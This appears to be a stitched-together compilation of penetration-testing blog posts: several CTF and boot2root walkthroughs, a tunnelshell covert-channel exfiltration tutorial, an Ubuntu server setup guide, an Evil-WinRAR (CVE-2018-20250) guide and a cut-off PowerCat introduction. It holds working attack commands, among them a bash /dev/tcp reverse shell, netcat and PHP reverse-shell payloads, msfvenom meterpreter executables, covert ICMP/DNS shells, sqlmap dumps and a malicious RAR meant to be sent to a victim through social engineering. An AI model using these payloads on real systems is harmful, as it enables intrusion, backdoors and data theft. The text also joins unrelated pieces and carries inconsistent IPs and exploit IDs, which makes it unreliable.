Hello friends! Today we are going to take another CTF challenge known as “SP eric”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get 2 flags to complete the challenge.

They are located at:

/root/flag.txt

/home/eric/flag.txt

You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

Network scanning (Nmap)

Surfing HTTP service port

Enumerating directories using Dirb

Dumping git files using gitdumper

Extracting git file using Extractor

Enumerating for Login Credentials

Uploading PHP reverse shell

Getting user flag

Editing the file with php shell

Getting root flag

Walkthrough

We will start the cracking of this CTF with a port scan using nmap. Through the nmap scan we get that we have the port 80 open. Also as we can see in the given image that we have also discovered the .git directory.

nmap -A 192.168.1.18

By convention, if we have the port 80, we try and open the IP Address in the Web Browser. On doing so we see a message of “Blog under construction”. This seems like a Dead End. Let’s try another approach.

We ran a directory bruteforce using the dirb tool. This revealed the admin.php, index.php and a directory named “upload”. We will try to discover all these to enumerate as much as we can.

dirb http://192.168.1.18

On opening the admin.php, we get a form with the Username and Password fields. Seeing a form, our basic instinct was the SQL Injections. We spent a little time on that, then we took the advice of author that there is no use of Bruteforcing. We will have to figure our some another way.

Now, back on the nmap scan we did in the beginning. We found a Git repository. On browsing a few sites on Google, we found this epic tool called GitTools. We cloned this tool on our Desktop as shown in the given image. After that we traversed in the GitTools Directory to using the cd command. Here, we found 3 tools: Dumper, Extractor, Finder. We will use this tool to enumerate this git.

git clone https://github.com/internetwache/GitTools.git

cd GitTools/

First, we traversed into the Dumper directory to use the gitdumper tool. This tool will dump all the files on the git. We will have to give a destination directory to use it. This tool can be used as shown in the given image.

./gitdumper.sh http://192.168.1.18/.git/dest-dir

Now that we have successfully dumped the git files using the gitdumper tool. It’s time to use the Extractor tool. For this we will have to traverse inside the Extractor directory inside the GitTools. Now to use the extractor we will have to give the path of the destination directory in with we dumped the git files using the gitdumper.

./extractor.sh ../Dumper/dest-dir ./dest-dir

The Extractor tool, will create the directories based on the commits on the git that we dumped earlier which can be observed in the given image. Three directories were created in response to three commit on the git. We traversed in the directory named “0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/” to find three file: admin.php, commit-meta.txt and index.php. We read the admin.php file using the cat command to find the username and password for the form we found earlier. We made a note of these credentials.

cd 0-3db5628b550f5c9c9f6f663cd158374035a6eaa0/

cat admin.php

We went back to the admin form we discovered earlier and entered the login credentials we found in the git. This was a successful login. Upon logging in we found more form, titled: Add new post and Add site to blogroll. Here, we found an Upload option.

So, we entered the necessary information in the various field on the page and selected a php reverse shell in the location of uploading the file. After all the entries filled, we clicked on the add button to upload the file with this entry.

Even though, the file was successfully uploaded, to get the session, we will have to execute the file on the target machine. Back to the nmap scan, we founded a directory called “upload”. It’s time to get to that directory. We used the name of the php file we uploaded to execute the file on the target system as shown in the given image.

On the other side, in a new terminal, we created a netcat listener at the port that we mentioned the php reverse shell script. Upon Execution, we got the shell of the target system. To get a proper shell, we used the python one liner. After getting the proper shell, we used the ls command to enumerate for the flag. We traversed in the eric directory. Here we found the 1^st flag as shown in the given image. We also found a file named backup.sh. As we can see in the given image that the backup.sh file have all the permission required and it runs as root.

nc -lvp 1234

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

cd /home

ls -al

cd eric

ls -al

cat flag.txt

So, we have to target the backup.sh file to get the root shell on the target machine. We created an msfvenom script to exploit the target machine. We used the reverse_bash payload to create this script.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.4 lport=4455 R

We copied the script contents and then we moved the session we had on the target machine and here we edited the backup.sh file with our script using echo command.

echo "0<&171-;exec 171<>/dev/tcp/192.168.1.4/4455;sh <&171 >&171 2>&171"> backup.sh

cat backup.sh

On a new terminal, we started a netcat listener on the port that we metioned while createing the script using msfvenom. When we ran the file the backup.sh file, we have a root session. Being an improper shell, we improved it using the python one liner. Here, we traversed in the root directory. We found the root flag here in this directory as shown in the given image.

nc -lvp 4455

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

cd /root

cat flag.txt

Generally, the hacker uses hidden network to escape themselves from firewall and IDS such. In this post, you will learn how to steal information from target machine through undetectable network. Such type of network is known as covert channel which seems as generic traffic to any network monitor device/application and network admin. It could be considered as steganography, but it is not exactly steganography. Two endpoint users can use covert channel for undetectable communication from network admin, for example terrorist.

The red teamers use covert channels for data exfiltration in red teaming operations through a legitimate network and the data exfiltration is a process of secretly sharing data between two endpoints.

Table of content

What is Covert channel

· Type of covert channel

Covert channel attack using tunnelshell

· What is Tunnelshell

· Covert ICMP Channel

· Covert HTTP Channel

· Covert DNS Channel

What is covert channel?

The word covert means “hidden or undetectable” and Channel is “communication mode”, hence a covert channel denotes an undetectable network of communication. This makes the transmission virtually undetectable by administrators or users through a secret channel. It's very essential to know the difference between encrypted communication and covert communication. In covert communication the data stream is garbled and lasting by an unauthorized party. However, encrypted communications do not hide the fact that there has been a communication by encrypted the data travelling between both endpoints.

Type of covert channel

Storage covert Channel: Communicate by modifying a "storage location", that would allow the direct or indirect writing of a storage location by one process and the direct or indirect reading of it by another.

Timing Covert channels - Perform operations that affect the "real response time observed" by the receiver.

Note: The well – known Spectre and Meltdown use a system’s page cache as their covert channel for exfiltrating data.

The specter and Meltdown attacks work by tricking your computer into caching privileged memory and through miscalculated speculative execution, a lack of privilege checking in out-of-order execution, and the power of the page cache. Once privileged memory is accessed the processor caches the information and the processor is able to retrieve it from the cache, regardless of whether its privileged information or not.

Read complete article from here.

Covert Channel Attack Using Tunnelshell

It is possible to use almost any protocol to make covert channel.The huge majority of covert channel research has based on layer 3 (Network) and layer 4 (Transport) protocols such as ICMP, IP and TCP. Layer 7 (Application) protocols such as HTTP and DNS are also frequently used. This mechanism for conveyaning the information without alerting network firewalls and IDSs and moreover undetectable by netstat.

What is tunnelshell?

Tunnelshell is a program written in C for Linux users that works with a client-server paradigm. The server opens a /bin/sh that clients can access though a virtual tunnel. It works overmultiple protocols, including TCP, UDP, ICMP, and RawIP, will work. Moreover, packets can be fragmented to evade firewalls and IDS.

Let’s go with practicle for more details.

Requirement

· Server (Kali Linux)

· Client (Ubuntu18.04)

· Tool for Covert Channel (Tunnelshell) which you can download from here.

Here, I’m assuming we already have a victim’s machine session through c2 server. Now we need to create a hidden communication channel for data exfiltration, therefore, install tunnelshell on both endpoints.

Once you download it, then extract the file and compile it as shown below:

tar xvfz tunnelshell_2.3

make

Similarly, repeat the same at the other endpoint (victim’s machine) and after completion, execute the following command in the terminal to open communication channel for the server (Attacker).

sudo ./tunneld

By default, it sends fragment packet, which reassembles at the destination to evade from firewall and IDS.

Now to connect with tunnelshell we need to execute following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

Syntax: ./tunnel -i -d -s -t -o -p -m -a

./tunnel -t frag 10.10.10.2

frag: It use IPv4 fragmented packets to encapsulate data. When some routers and firewalls (like Cisco routers and default Linux installation) receives fragmented packets without headers for the fourth layer, they permit pass it even if they have a rule that deny it. As you can observe that it is successfully connected to 10.10.10.2 and we are to access shell of the victim’s machine.

As I had said, if you will check the network statics using netstat then you will not observe any process ID for tunnelshell. From the given below image you can observe that with the help of ps command I had checked in process for tunnelshell and then try to check its process id through netstat.

ps |grep .tunneld

netstat –ano

Let’s take a look of network traffic generated between 10.10.10.1 (Attacker’s IP) and10. 10.10.2 (Victim’s IP) using Wireshark. The network flow looks generic between both endpoints, but if it monitors properly, then a network administrator could sniff the data packet. As you can observe that Wireshark has captured the covert traffic and sniff the data that was travelling between two endpoint devices.

Covert ICMP Channel

As we know Ping is the use of ICMP communication that use icmp echo request and icmp echo reply query to establish connection between two hosts therefore execute the below command:

sudo ./tunneld -t icmp -m echo-reply, echo

Now to connect with tunnelshell we need to execute following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

./tunnel -t icmp -m echo-reply,echo 10.10.10.2

As you can observe that it is successfully connected to 10.10.10.2 and the attacker is able to access shell of the victim’s machine.

Again, if you will capture the traffic through wireshark then you will notice the ICMP echo request and reply packet is being travelling between both endpoints. And if you will try to analysis these packets then you will be able to see what kind of payload is travelling as ICMP data.

Covert HTTP Channel

It establishes a virtual TCP connection without use three way handshakes. It doesn't bind any port, so you can use a port already use it by another process, therefore execute the below command:

sudo ./tunneld -t tcp -p 80,2000

Now to connect with tunnelshell we need to execute following command on the server (Attacker’s machine) which will establish a covert channel for data exfiltration.

./tunnel -t tcp -p 80,2000 10.10.10.2

As you can observe that it is successfully connected to 10.10.10.2 and again attacker is able to access shell of the victim’s machine.

Onside, if you consider the network traffic then you will notice a tcp communication establish without three-way-handshake between source and destination.

Covert DNS Channel

To establish DNS covert channel, we need to run UDP tunnel mode on both endpoint machines. Therefore, execute the following command on the victim’s machine:

sudo ./tunneld -t udp -p 53,2000

Similarly execute following on your (Attacker) machine to connect with a tunnel.

./tunnel -t udp -p 53,2000 10.10.10.2

As you can observe here the DNS malformed packet contains the data traveling between both endpoint machine.

Conclusion: Covert channel does not send encrypted data packet while data exfiltration therefore it can easily sniff, and network admin can easily conduct data loss and risk management.

Today we are going to solve another CTF challenge “Teacher”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of Curling is 10.10.10.153

Penetrating Methodology

Scanning

· Network Scanning (Nmap)

Enumeration

· Web Spidering (dirb)

· Abusing HTTP service

· Password Fuzzing (Wfuzz)

Exploiting

· Evil Teacher Attack

· Obtain Netcat session

· Get config.php to obtain mysql password

· Connect to mysql

· Extract tables to obtain login credentials

· Get user.txt

Privilege Escalation

· Sym linking root directory

· Get root.txt

Walkthrough

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sC -sV -p- 10.10.10.153

As you can observe that it shown port 80 is open for http services.

We found a school website on exploring port 80, and I didn't find a lot of information here. This website appears to be designed for online courses and the author may use some educational cms to design it.

Enumeration

Since it is a learning site that needs to be designed for online classes using a CMS platform. Therefore, I will go for the enumeration of the web directory without wasting much time.

dirb http://10.10.10.153

If you notice the image below, you will find a web directory /moodle. The website is therefore proven to be designed on MOODLE CMS, let's explore it further.

When I explored http:/10.10.10.153/moodle, it's the "Giovanni Chhatta" teacher portal for online classes in Mathematics Algebra. If you're looking for a moodle exploit, you're going to see it vulnerable to SQL and RCE. So, to exploit it, we need to log in to this account, but we don’t have credentials.

I felt like photo gallery looks suspicious while spidering because each row contains 4 tiles and one photo in the top left corner is missing.

Therefore, I check the source code of the page and there is some error where I saw picture 5. We need to download this picture to identify more about the image error.

So, I downloaded this image 5 with the help of the wget command and identified the type of file.

wget http://10.10.10.153/images/5.png

file 5.png

Though it looks like an image, but it was ASCII file that we could open in any text editor. As you can see with the help of the cat command, I opened the 5.png file where I found the "Giovanni" user password clue.

PASSWORD HINT: “Iforgot the last character of my password. The only part I remembered is Th4C00lTheacha”

Since the password's last character was missing, I created a wordlist with the command below.

crunch 15 15 -t Th4C00lTheacha^ -o pass.txt

Now let use wfuzz for fuzzing brute force using wordlist to identify valid login combination.

wfuzz -w pass.txt -L 20 -d "username=giovanni&password=FUZZ" -hw 1224 http://10.10.10.153/moodle/login/index.php

WoW!! We got HTTP 200 ok response for Giovanni: Th4C00lTheacha#

Exploiting

We get inside the dashboard with the help of the above login credential. Now let's try to exploit, if you're going to google for moodle exploit then it's going to show you EVIL TEACHER attack which you can read from here.

We now need to edit a new activity in order to exploit it, so explore settings > edit > add an activity or resource. Now you're going to get a prompt to select an activity you want to add, I've chosen quiz here.

Then click on Ethical hacking quiz to add some question inside it.

Click on Edit option for adding question.

Now click on Add > + a new question which will open a console to add quiz question.

Choose “calculated” the question type to add.

Now, when you ask a question, you need to mention the answer in the given text area, but this is vulnerable to EVIL TEACHER attack. Now get the reverse shell we insert a formula in the filed text given to write the answer and then click on save the changes.

1?>

Start netcat in the local machine and then inject netcat reverse shell payload in the URL as shown in the image, click on next page:

nc -lvp 1234

&0(data;nc -e /bin/bash )

Repeat the same to inject nc payload once again and execute the url to get netcat session.

&0(data;nc -e /bin/bash )

You can see here that we pwned the target machine's web shell, let's explore more to get user.txt and root.txt. So, I check the directory list inside /moodle here that I found a config.php file.

I saw mysql login credential inside the config.php file as shown below.

Connect to mysql to extract information from the database such as credentials for system login.

mysql -u root -p’Welkom1’ moodle

show tables;

Here mdl_user table looks more interesting, let’s extract its column information in hop to get some useful information.

show columns from mdl_user;

WOW! WOW!! It includes the username and column of the password, let's explore it.

select user,password from mdl_user;

Here I found 4 users with md5 hash value, let's try cracking them.

So, we got password "expelled" by using the online md5 decryption tool.

Now use the credentials above and switch user account to try to locate user.txt file.

su Giovanni

password: expelled

cat user.txt

Yeah! Yeah. We got our 1st flag successfully, now let's find out about root.txt, but as we know it needs an escalation of privilege.

Privilege Escalation

So, while traversing, I found a backup_course.tar file file inside /home/giovanni/work/tmp

I found a backup _course.tar file inside /hom /giovanni/work/tmp while traversing.

Therefore, since the current directory has full permission, I try to link the root directory within the /tmp folder so that we can get backup of the root directory within the /tmp folder with the help of backup.sh.

ln -s /root tmp

Fantastic!! I found /root directory within /tmp after 1-2 minutes, which means that without root access we can get root.txt file as shown below.

cd /tmp

cd /root

cat root.txt

Booom!! We found root.txt successfully!!!!!!!!!!!

Today we are going to solve another CTF challenge “irked”. It is a retired vulnerable lab presented by Hack the Box for helping pentesters to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of ircked is 10.10.10.117

Penetrating Methodology

· Scaning

· Enumerating

· Exploiting

· Get user.txt

· Privelege Escalation

· Get root.txt

Walkthrough

Scanning

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -p- -sV 10.10.10.117 --open

As you can see that port 22,80 is open for ssh, http services respectively, some other ports for irc (unrealircd) are available.

It gave us a frustrated emoji when exploring port 80, as shown below, and some hints for irc are working. This image might have some hidden information, so I download this image and begin to penetrate it.

Enumeration

I tried to extract hidden information with the help of steghide, but it needs passphrase for that. I search for unrealIRCd when this approach didn't work.

Exploiting

Fortunately, I found an exploit for unrealircd in Metasploit, although the default port for ircd is 6667, but it runs on 6697 here. I pwned the victim machine successfully after running module.

use exploit/unix/irc/unreal_ircd_3281_backdoor

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.13

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

So, as you can see, we've got the victim's machine command session, let's penetrate more to get user.txt and root.txt. First, to obtain the appropriate terminal, we need to import pty shell, so type:

python -c 'import pty;pty.spawn("/bin/bash")'

I found user.txt within /home/djmardov/documents, but since we're logged as an ircd, there's no permission to read this file. There was also a .backup hidden file and it gave us a "UPupDOWNdownLRlrBAbaSSs" password.

We found frustrated emoji in the beginning, requiring a passphrase to extract the hidden text behind the image. So, as a passphrase, I use the password above and found a pass.txt file from within irked.jpg.

steghide extract -sf irked.jpg

I found another password from the inside pass.txt file "Kab6h+m+bbp2J: HG."

Privilege Escalation

Now I use following credential to connect with victim’s machine through ssh.

Username: djmardov@10.10.10.117

Password: Kab6h+m+bbp2J:HG

First, I open the user.txt file and finish the first challenge along with that. Now let's penetrate more to find root.txt file, and that's why we need to increase the privilege, so I'm trying to find out if there's any suid permission script.

ssh djmardov@10.10.10.117

cat user.txt

find / -perm -u=s -type=f 2>/dev/null

Here /usr/bin/viewuser looks more interesting, let’s check it out.

So, when I run the program, I found that this application was being developed to set test user permissions but couldn't find listusers file within /tmp. This program is therefore searching for data from the listusers file and the file is missing from the directory inside /tmp.

So what we can do is write a script to call bin / sh and save it as listusers inside /tmp and then run the viewuser to run it.

echo ‘/bin/bash’ > /tmp/listusers

chmod 777 /tmp/listusers

/usr/bin/viewusers

Boomm!! We have root access now, lets grab the root.txt file and finish the assign task.

cd /root

cat root.txt

Hello friends! Today we are going to take another CTF challenge known as “SP ike”. The credit for making this VM machine goes to “Daniel Solstad”. Our goal is to get flags to complete the challenge.

Security Level: Intermediate

Penetrating Methodology:

Discovering Targets IP
Network scanning (Nmap)
Surfing HTTP service port
Configuring HEXCHAT IRC Client
Connecting to IRC Server
Creating PHP Malicious Script using MSFvenom
Using Netcat Listener
Spawning TTY Shell
Getting Root Access
Reading Final Flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover

We found our target –> 192.168.1.21
Time to scan the Target’s IP with nmap. Nmap scan result shows FOUR open ports, 80(http), 139(netbios-ssn), 445(netbios-ssn), 6667(irc).
nmap -sV -T4 192.168.1.21

Since port 80 is running HTTP, so we thought of browsing the Target’s IP in our browser. But it is not much of a great help. Moving on.

Even directory scanning using dirb tool was not very useful. At last we are left with IRC chat server on port(6667). So, we used an IRC client Hexchat to connect to the port(6667). First we need to configure Hexchat by Adding a New Profile and Editing Connection Details.

Now Edit the Network ike which we have added and Give the Target’s IP as you can see in the image.

We have successfully connected to IRC Server. And we found something interesting that the server has a channel #php which has a phpbot, I guess it wouldn’t be problem for the phpbot to execute a php script.

We created a msfvenom script to exploit the target machine. We used the reverse_netcat payload to create this script.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.34 lport=1234 R

After making a few tries, we finally able to execute our PHP script successfully. To get reverse shell execute the script given below.

!php $s=array(); $p=array(); proc_open("mkfifo /tmp/tsglu; nc 192.168.1.34 1234 0

/tmp/tsglu 2>&1; rm /tmp/tsglu", $s, $p);

Oh Yeah!! We got the reverse shell, but it is not a proper shell. We will spawn a ttyshell using python. After doing sudo -l, we saw nmap can be used with root privileges. So to get root, we used commands given below and successfully got root access. Time to read the FLAG!!

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

In this post, we will discuss how to set-up our own web server for penetration testing on ubuntu 18. Ubuntu 18 has updated with the new features.

Table of content

Requirement

Web Server configuration

· Apache2

· php7.2

· MySQL server

· phpMyAdmin

· Ftp protocol

· Openssh server

· Nmap

Requirement-ubuntu 18.0

Web Server Configuration

The Web server is a program that uses HTTP to serve users with files forming web pages in response to requests transmitted by their HTTP clients. The Web servers can also be called dedicated computers and apparatuses.

Install Apache2

First, we will install Apache2. Apache is the most commonly used Web server on Linux Systems. Web servers are used to serve web pages requested by the client computers. So, let’s first install Apache in the ubuntu by the following command-

apt install apache2

We have successfully installed apache2, by default apache runs on port 80.

Install PHP

Now we will install PHP 7modukle for apache 2 and for all of its dependencies. Earlier we used to install PHP 5 module for ubuntu 14. But now as it is not compatible in ubuntu 18.so we will install the latest version of php which is php7.2 For this run the following command in ubuntu terminal-

apt install php7.2

As you can see, we have done with php installation.

Install MySQLServer

Now comes the next step which is installation of MySQL server. MySQL is the famous open-source database which was very easier to install earlier. But now it requires some changes for ubuntu 18.

So, let’s go ahead step by step.

First, we will install MySQL sever by the following command-

apt get install mysql-server

So, we are done with the installation. In ubuntu 14, MySQL did not need a password as it required only the root user to logged in. But now it needs a password and it won’t allow root user to log in so we will provide a username and password of ubuntu in MySQL with the following command and as it will ask for the password; you have to use your ubuntu password here.After it gets logged in you will grant all the privileges to the user of ubuntu as in our case we have give all the privileges to user raj which will be identified with the password of ubuntu which is 123 in our case and after which we will reset all the previous privileges so that it can start the service with the new changes. For this the commands are the following.

mysql -u root -p

GRANT ALL PRIVILEGES ON *.* TO ‘raj’@’%’ IDENTIFIED BY ‘123’ WITH GRANT OPTION;

flush privileges;

Great we are done with MySQL sever installation, by default it runs on port 3306, now restart mysql service.

service mysql restart

Install phpMyAdmin

Now the next step is installation of phpMyAdmin software tool which is written in PHP and which is proposed to handle the administration of MYSQL over the WEB and it also supports a wide range of operations on MYSQL. First, we need to install phpMyAdmin by the following command-

apt install phpmyadmin

After the installation it will ask you to choose the web server. Here you need to choose apache2 which will automatically be configured to run phpmyadmin.

Next you will get a prompt which will be opened to configure database for phpmyadmin with dbconfig-common. Here you need to click on yes and the enter.

Again, you will get a prompt which will ask you to submit the password for phpMyAdmin, to register with the database server. Here we have given 123 as the password as it is essential to give it a password now.

The next step is configuration of phpmyadmin under apache, for this we need to edit apache2 conf file by adding two lines at the end of this file:

nano /etc/apache2/apache2.conf

#phpMyAdmin Configuration

Include/etc/phpmyadmin/apache.conf

At the last as shown in the image below and then save it and after the editing save the file and restart apache2 service.

service apache2 restart

Now open phpmyadmin in the browser as localhost/phpmyadmin as shown in the image below-

Install ftp

Now we will install FTP server in ubuntu which is used for the transfer of computer files between a client and server on a computer network. For this run the following command in the terminal-

apt install vsftpd

As we can see in the above screenshot that ftp service has been installed in our system which runs on port 21

Install ssh

Now the next is SSh protocol which is method for secure remote login from one computer to another.so lets install this service by the following command.It is installed successfully; by default, it runs on port 22.

apt install openssh-server

Install Nmap

Now in order to check that the above services have been installed properly in our system; we will use nmap which is a scanner for ports and which tells us about the open ports and running services status.

So, let’s install that by the following command-

apt install nmap

Once the installation is done, we will scan our own system by the following command and it will scan our system and will come up with the desired results as you can see in the image given below-

nmap 127.0.0.1

In this post WinRAR has patched a serious security faults last month, one of the world's most popular Windows file compression applications, which can only be exploited by tricking a WinRar user to extract maliceous archives. The vulnerability identified last year by research.checkpoint.comaffects all versions released in all WinRAR over the past 19 years.

More About Evil Winarar

CVE-ID: CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, and CVE-2018-20253

Pacted Version:WinRAR 5.70 Beta 1

This vulnerability is due to the UNACEV2.DLL library included with all versions of WinRAR. The winrar uses the ACE format to compress the folder and unpack the compressed folder with the help of UNACE.DLL.

In WinRAR versions prior to and including 5.61, There is path traversal vulnerability when crafting the filename field of the ACE format (in UNACEV2.dll). When the filename field is manipulated with specific patterns, the destination (extraction) folder is ignored, thus treating the filename as an absolute path. This happence due improper compilation when unace.dll come into face.

Let's download a python script that will generate a malicious file archive in a rar format. Once you download the python script, install the dependency required for it.

git clone https://github.com/manulqwerty/Evil-WinRAR-Gen.git

cd Evil-WinRAR-Gen/

pip3 install -r requirements.txt

Further you need to give full permission to the python script inside the Evil-Winrar-Gen folder and then generate a malicious exe file with the help of msfvenom and name as “winrar.exe” as shown and multi handler inside metasploit.

chmod 777 evilWinRAR.py

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.110 lport=1234 -f exe > winrar.exe

Now create a text file that will display to the victim when he extracts the rar file to confuse him. Then execute evilWinrar python script along with malicious exe file and text file, creating a malicious archive that you can send to the target.

touch winrar.txt

./evilWinRAR.py -e winrar.exe -g winrar.txt

python -m SimpleHTTPServer 8080

As said, this vulnerability allows us to extract the malicious file in the arbitrary path, with the help of this script we will allow rar files extraction in the /startup program. Now use social engineering for transferring the malicious rar to the victim and wait for victim to restart his machine to obtain reverse connection of the target.

There is currently no startup program in the target machine as shown below. Once the victim extracts the malicious rar file "evil.rar," our winrar.exe backdoor will extract from the startup program.

To ensure for winrar.exe file in startup folder, type shell:startup in the run prompt.

As soon as the victim will restart the machine, you will get reverse connection as shown.

Hello friends! Today we are going to take another boot2root challenge known as “DC-2”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.

Security Level: Beginner

Penetrating Methodology:

· Discovering Targets IP

· Network scanning (Nmap)

· Adding Domain name to Host file

· Surfing HTTP service port

· Using WPscan for Username enumeration

· Using cewl for creating wordlist

· Logging into Wordpress

· Logging in through SSH

· Escaping restricted shell

· Finding binary in sudoers list

· Getting root access and Reading final flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover

We found our Targets IP Address 192.168.1.101. Our next step is to scan our targets IP Address with nmap.
nmap -p- -A 192.168.1.101
OKAY!! With the following result of nmap scan I found here port 7744 is used for SSH and port 80 for HTTP service, moreover there all it shows all http services are made to redirect on http://dc-2.

Therefore, we thought of adding the Domain Name into our Host file, so that we will be able to access http services.
cat /etc/hosts

Since port 80 is open, we explored the Domain Name on the browser. We discovered the webpage got a WordPress CMS installed on it.

The Flag option on the webpage clearly got our attention. Let’s check what hint it has for us. So from this page, we got a really good hint to move ahead.

So, the first idea that came to us was to run a wpscan on the webpage and see what the scan enumerates.

wpscan --url http://dc-2 --enumerate p --enumerate t --enumerate u

I found three user names: admin, jerry and Tom and as said above we need use cewl which is used for generating dictionary by spidering website.

Therefore, we have used cewl to build a wordlist for passwords from inside http://dc-2 as shown in the image.

cewl http://dc-2/ password

cat password

So, we have dictionary for passwords which we have generated using cewl and saved wordpress usernames in a text file.

cat users

Time to fire up wpscan with our username & password list to valid user login combination.

wpscan --url http://dc-2 -U users -P password

We have successfully found the password for Tom & Jerry. Let’s make good use of them.

jerry: adipiscing

tom: parturient

Further, we login to wordpress using Jerry credentials. It was holding another clue for us in Flag 2.

Since the clue was telling us to find another entry point to reach to our final flag. Suddenly we thought making a SSH Login running on port 77454 by using Tom credentials.

We successfully got logged in but we have a restricted shell in which some commands are not found. But few commands are available.

ssh tom@192.168.1.101 -p 7744

cat flag3.txt

echo $PATH

ls /home/tom/usr/bin

As you can observe that cat program is not present inside /bin and tom can run only five programs present inside /bin directory.

Since we had a restricted shell, we found that we can use the Vi editor. Therefore, we use Vi editor to escape the restricted shell.

After escaping the restricted shell, we export “/bin/bash” as our SHELL environment variable and “/usr/bin” as our PATH environment variable so that we can run Linux commands properly.

export PATH=/bin:/usr/bin:$PATH

export SHELL=/bin/bash:$SHELL

After that we try to open flag3.txt afain using cat command and luckily found next hint to move ahead.

cat flag3.txt

According to hint, now we need to switch user from tom to jerry but we don’t have jerry’s login credential. Then checked the sudoers list and found that tom can run “/usr/bin/git” as root without a password.

sudo -l

Having the root permission on git was like cherry on cake, because through this I can try to escalate low privilege shell to high privilege shell.
sudo git help add

Since the help console of git opens with editor where we can run below command. And for spawning root shell type !/bin/bashand hit enter.

Boom!!! We got the root access, then we switch to the root directory and found our final flag.

cd /root

cat final-flag.txt

Hello friends! Today we are going to take another boot2root challenge known as “DC-3”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.
Security Level: Beginner

Penetrating Methodology:

· Discovering Targets IP

· Network scanning (Nmap)

· Surfing HTTP service port

· Searching exploits via searchsploit

· Using SQLMAP to dump databases information

· Using John the Ripper to Crack the Password

· Login into JOOMLA

· Inject malicious PHP Reverse Shell Code

· Using Netcat for obtaining reverse connection

· Exploit the kernel

· Getting root access

· Reading Final flag

Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover

We found our Targets IP Address 192.168.1.104; Our next step is to scan our targets IP Address with nmap.
nmap -A 192.168.1.101
From nmap result we found only HTTP service is running on port 80 and we got to know that JOOMLA CMS is installed on this website.

So, we navigate to port 80 by exploring target IP in the web browser and read the text message of the admin, moreover the website was running on joomla CMS as found above.

So to identify installed joomla version, we checked its Readme file. We can clearly come to know about the version of Joomla 3.7, I think this is might come in handy.

We looked for Joomla 3.7 in searchsploit and found JOOMLA SQL INJECTION exploit. We copied the exploits 42033.txt file on our machine and read it contents. It revealed a Command for Sqlmapalong with a vulnerable URL.

Then we executed given below sqlmap command and with the help of it we look for the Database names that revealed database 5 entries as shown in the image given below where I notice joomladb.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Let’s again use Sqlmap to look for the tables and column.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch

After getting the table names, we have dumped the contents of table #_users using sqlmap, which revealed credentials which that come in handy to log into JOOMLA. But the password is encoded, we need to crack it. Time to fire up John up.

sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batch

We have saved the hash in our system and use john the ripper to crack the hash. Now we have both the credentials to log into Joomla.
Username- admin
Password- snoopy

Let’s login into joomla as admin.

After spending some time exploring, we got an idea to add a malicious PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting reverse shell as shown below.

On the other side, we setup a netcat listener. Upon Execution, we got the shell of the target system. To get a proper shell, we have used the python one-liner to spawn the TTY shell.

nc -lvp 1234

python -c 'import pty;pty.spawn("/bin/bash")'

uname -a

lsb_release -a

From the LSB description, we clearly knew for this version of Ubuntu has a direct exploit which can be used to get the root access and found our final flag.

Without wasting time, we found a privilege escalation exploit for ubuntu 16.04. We have downloaded it and extracted it.

cd /tmp

wget https://www.exploit-db.com/exploits/39772

unzip 39722.zip

cd 39772

tar -xvf exploit.tar

After running the exploit, we have easily got the root access and thus got our Final flag.

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

cd root

cat the-flag.txt

The word PowerCat named from Powershell Netcat which is a new version of netcat in the form of powershell script. In this article we will learn about powercat which a PowerShell tool for is exploiting windows machines.

Table of content

· Requirement & Installations

· Testing PowerShell Communication

· Bind Shell

· Execute Shell

· Tunneling or port forwarding

Introduction & Requirements

PC-1 192.168.1.16

PC-2 192.168.1.19

Powercat PowerShell Script

Powercat brings the usefulness and intensity of Netcat to every ongoing form of Microsoft Windows. It achieves this objective by utilizing local PowerShell form 2 segments. This permits simple organization, use, and minimal possibility of being gotten by customary antivirus arrangements. Furthermore, the most recent adaptations of Powercat incorporate propelled usefulness that goes well past those found in customary types of Netcat.

By default, we cannot run PowerShell scripts in windows. To run PowerShell scripts, we have to first change the execution policy of PowerShell. First, we run PowerShell as an administrator then we run the following command to change the execution policy: -

Set-ExecutionPolicy Unrestricted

